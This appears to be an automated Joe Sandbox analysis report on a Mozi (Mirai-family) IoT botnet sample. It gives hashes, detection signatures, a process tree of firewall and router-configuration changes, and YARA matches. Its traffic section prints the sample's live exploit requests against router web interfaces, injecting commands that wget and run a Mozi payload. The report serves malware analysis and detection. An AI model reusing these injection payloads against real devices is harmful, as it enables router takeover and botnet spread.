Edit tour

Linux Analysis Report
Mozi.m.3

Overview

General Information

Sample Name:	Mozi.m.3
Analysis ID:	562113
MD5:	eec5c6c219535fba3a0492ea8118b397
SHA1:	292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:	12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Antivirus detection for dropped file

Sample tries to persist itself using System V runlevels

Opens /proc/net/* files useful for finding connected devices and routers

Sample tries to persist itself using /etc/profile

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Uses known network protocols on non-standard ports

Found strings indicative of a multi-platform dropper

Sample reads /proc/mounts (often used for finding a writable filesystem)

Terminates several processes with shell command 'killall'

Writes ELF files to disk

Yara signature match

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Writes HTML files containing JavaScript to disk

Sample contains strings that are potentially command strings

Sample contains strings indicative of password brute-forcing capabilities

Sample has stripped symbol table

Sample tries to set the executable flag

HTTP GET or POST without a user agent

Executes commands using a shell command-line interpreter

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562113
Start date:	28.01.2022
Start time:	13:56:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 59s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Mozi.m.3
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.spre.troj.evad.lin3@0/486@5/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
VT rate limit hit for: http://%s:%d/Mozi.m;$

Runtime Messages

Command:	/tmp/Mozi.m.3
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	telnetd: no process found utelnetd: no process found scfgmgr: no process found Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 /bin/sh: 1: cfgtool: not found /bin/sh: 1: cfgtool: not found Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 qemu: uncaught target signal 4 (Illegal instruction) - core dumped Unsupported ioctl: cmd=0xffffffff80045705

Process Tree

system is lnxubuntu20

Mozi.m.3 (PID: 5220, Parent: 5118, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Mozi.m.3

Mozi.m.3 New Fork (PID: 5222, Parent: 5220)

Mozi.m.3 New Fork (PID: 5224, Parent: 5222)

Mozi.m.3 New Fork (PID: 5226, Parent: 5224)

sh (PID: 5226, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"

sh New Fork (PID: 5229, Parent: 5226)

killall (PID: 5229, Parent: 5226, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr

Mozi.m.3 New Fork (PID: 5230, Parent: 5224)

Mozi.m.3 New Fork (PID: 5232, Parent: 5224)

Mozi.m.3 New Fork (PID: 5234, Parent: 5224)

Mozi.m.3 New Fork (PID: 5251, Parent: 5234)

sh (PID: 5251, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT"

sh New Fork (PID: 5255, Parent: 5251)

iptables (PID: 5255, Parent: 5251, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5260, Parent: 5234)

sh (PID: 5260, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT"

sh New Fork (PID: 5262, Parent: 5260)

iptables (PID: 5262, Parent: 5260, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5263, Parent: 5234)

sh (PID: 5263, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT"

sh New Fork (PID: 5265, Parent: 5263)

iptables (PID: 5265, Parent: 5263, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5268, Parent: 5234)

sh (PID: 5268, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT"

sh New Fork (PID: 5270, Parent: 5268)

iptables (PID: 5270, Parent: 5268, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5271, Parent: 5234)

sh (PID: 5271, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 41039 -j ACCEPT"

sh New Fork (PID: 5273, Parent: 5271)

iptables (PID: 5273, Parent: 5271, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5274, Parent: 5234)

sh (PID: 5274, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT"

sh New Fork (PID: 5276, Parent: 5274)

iptables (PID: 5276, Parent: 5274, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5277, Parent: 5234)

sh (PID: 5277, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT"

sh New Fork (PID: 5279, Parent: 5277)

iptables (PID: 5279, Parent: 5277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5280, Parent: 5234)

sh (PID: 5280, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT"

sh New Fork (PID: 5282, Parent: 5280)

iptables (PID: 5282, Parent: 5280, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT

Mozi.m.3 New Fork (PID: 5238, Parent: 5224)

Mozi.m.3 New Fork (PID: 5242, Parent: 5224)

Mozi.m.3 New Fork (PID: 5249, Parent: 5224)

Mozi.m.3 New Fork (PID: 5285, Parent: 5224)

sh (PID: 5285, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"

sh New Fork (PID: 5287, Parent: 5285)

iptables (PID: 5287, Parent: 5285, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP

Mozi.m.3 New Fork (PID: 5288, Parent: 5224)

sh (PID: 5288, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"

sh New Fork (PID: 5290, Parent: 5288)

iptables (PID: 5290, Parent: 5288, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP

Mozi.m.3 New Fork (PID: 5291, Parent: 5224)

sh (PID: 5291, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"

sh New Fork (PID: 5293, Parent: 5291)

iptables (PID: 5293, Parent: 5291, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP

Mozi.m.3 New Fork (PID: 5294, Parent: 5224)

sh (PID: 5294, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"

sh New Fork (PID: 5296, Parent: 5294)

iptables (PID: 5296, Parent: 5294, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP

Mozi.m.3 New Fork (PID: 5297, Parent: 5224)

sh (PID: 5297, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""

Mozi.m.3 New Fork (PID: 5299, Parent: 5224)

sh (PID: 5299, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""

Mozi.m.3 New Fork (PID: 5301, Parent: 5224)

sh (PID: 5301, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"

sh New Fork (PID: 5303, Parent: 5301)

iptables (PID: 5303, Parent: 5301, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP

Mozi.m.3 New Fork (PID: 5304, Parent: 5224)

sh (PID: 5304, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"

sh New Fork (PID: 5306, Parent: 5304)

iptables (PID: 5306, Parent: 5304, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP

Mozi.m.3 New Fork (PID: 5307, Parent: 5224)

sh (PID: 5307, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"

sh New Fork (PID: 5309, Parent: 5307)

iptables (PID: 5309, Parent: 5307, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP

Mozi.m.3 New Fork (PID: 5310, Parent: 5224)

sh (PID: 5310, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"

sh New Fork (PID: 5312, Parent: 5310)

iptables (PID: 5312, Parent: 5310, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP

Mozi.m.3 New Fork (PID: 5313, Parent: 5224)

sh (PID: 5313, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"

sh New Fork (PID: 5315, Parent: 5313)

iptables (PID: 5315, Parent: 5313, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP

Mozi.m.3 New Fork (PID: 5316, Parent: 5224)

sh (PID: 5316, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"

sh New Fork (PID: 5318, Parent: 5316)

iptables (PID: 5318, Parent: 5316, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP

Mozi.m.3 New Fork (PID: 5319, Parent: 5224)

sh (PID: 5319, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"

sh New Fork (PID: 5321, Parent: 5319)

iptables (PID: 5321, Parent: 5319, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP

Mozi.m.3 New Fork (PID: 5322, Parent: 5224)

sh (PID: 5322, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"

sh New Fork (PID: 5324, Parent: 5322)

iptables (PID: 5324, Parent: 5322, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP

Mozi.m.3 New Fork (PID: 5325, Parent: 5224)

sh (PID: 5325, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"

sh New Fork (PID: 5327, Parent: 5325)

iptables (PID: 5327, Parent: 5325, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP

Mozi.m.3 New Fork (PID: 5328, Parent: 5224)

sh (PID: 5328, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"

sh New Fork (PID: 5330, Parent: 5328)

iptables (PID: 5330, Parent: 5328, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP

Mozi.m.3 New Fork (PID: 5332, Parent: 5224)

sh (PID: 5332, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"

sh New Fork (PID: 5334, Parent: 5332)

iptables (PID: 5334, Parent: 5332, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP

Mozi.m.3 New Fork (PID: 5335, Parent: 5224)

sh (PID: 5335, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"

sh New Fork (PID: 5337, Parent: 5335)

iptables (PID: 5337, Parent: 5335, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP

Mozi.m.3 New Fork (PID: 5347, Parent: 5224)

sh (PID: 5347, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"

sh New Fork (PID: 5349, Parent: 5347)

iptables (PID: 5349, Parent: 5347, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5350, Parent: 5224)

sh (PID: 5350, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"

sh New Fork (PID: 5352, Parent: 5350)

iptables (PID: 5352, Parent: 5350, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5353, Parent: 5224)

sh (PID: 5353, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"

sh New Fork (PID: 5355, Parent: 5353)

iptables (PID: 5355, Parent: 5353, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5356, Parent: 5224)

sh (PID: 5356, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"

sh New Fork (PID: 5358, Parent: 5356)

iptables (PID: 5358, Parent: 5356, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5359, Parent: 5224)

sh (PID: 5359, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"

sh New Fork (PID: 5361, Parent: 5359)

iptables (PID: 5361, Parent: 5359, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5362, Parent: 5224)

sh (PID: 5362, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"

sh New Fork (PID: 5364, Parent: 5362)

iptables (PID: 5364, Parent: 5362, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5365, Parent: 5224)

sh (PID: 5365, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"

sh New Fork (PID: 5367, Parent: 5365)

iptables (PID: 5367, Parent: 5365, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT

Mozi.m.3 New Fork (PID: 5368, Parent: 5224)

sh (PID: 5368, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"

sh New Fork (PID: 5370, Parent: 5368)

iptables (PID: 5370, Parent: 5368, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Mozi.m.3	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.m.3	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Mozi.m.3	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Mozi.m.3	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Mozi.m.3	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/usr/networks	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: Mozi.m.3 PID: 5220	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: Mozi.m.3 PID: 5220	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Process Memory Space: Mozi.m.3 PID: 5222	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: Mozi.m.3 PID: 5222	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Click to see the 14 entries

HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 186.219.131.213:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 162.209.132.128:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 148.229.1.12:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 205.198.160.107:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.25.119.143:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 171.25.175.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.35.5.125:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.58.36.209:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 54.173.33.241:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
